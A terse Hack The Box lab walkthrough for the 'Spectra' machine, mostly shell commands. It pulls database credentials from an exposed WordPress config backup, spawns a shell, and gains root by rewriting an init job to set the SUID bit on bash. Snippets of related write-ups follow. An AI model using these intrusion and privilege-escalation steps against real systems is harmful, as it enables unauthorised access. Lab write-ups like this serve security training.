Hack The Box – Spectra
──(root💀kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.10.229
http://spectra.htb/testing/index.php
┌──(root💀kali)-[/home/kali/Downloads]
└─# wget http://spectra.htb/testing/wp-config.php.save
‘DB_USER’, ‘devtest’
‘DB_PASSWORD’, ‘devteam01’
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
We get the cred
SummerHereWeCome!!
User.txt: e89d27fe195e911XXXXXXXXX
katie@spectra /etc/init $ sudo initctl list | grep test
katie@spectra /etc/init $ sudo /sbin/initctl stop test
katie@spectra /etc/init $ cat test.conf
script
chmod +s /bin/bash
end script
katie@spectra /etc/init $ sudo /sbin/initctl start test
katie@spectra /etc/init $ /bin/bash -p
Root.txt: d44519713b889d5eXXXXXXXXXX
Related Posts
Hack The Box – Breadcrumbs
http://10.10.10.228/ ┌──(root💀kali)-[/home/kali/Downloads/ffuf] └─# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php...
Hack The Box – Ophiuchi
http://10.10.10.227:8080/ ┌──(root💀kali)-[/home/kali/Downloads] └─# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts ┌──(root💀kali)-[/home/kali/Downloads] └─#...
Hack The Box – Scriptkiddie
http://10.10.10.226:5000/ exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ User.txt: ebca83b5823fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX echo...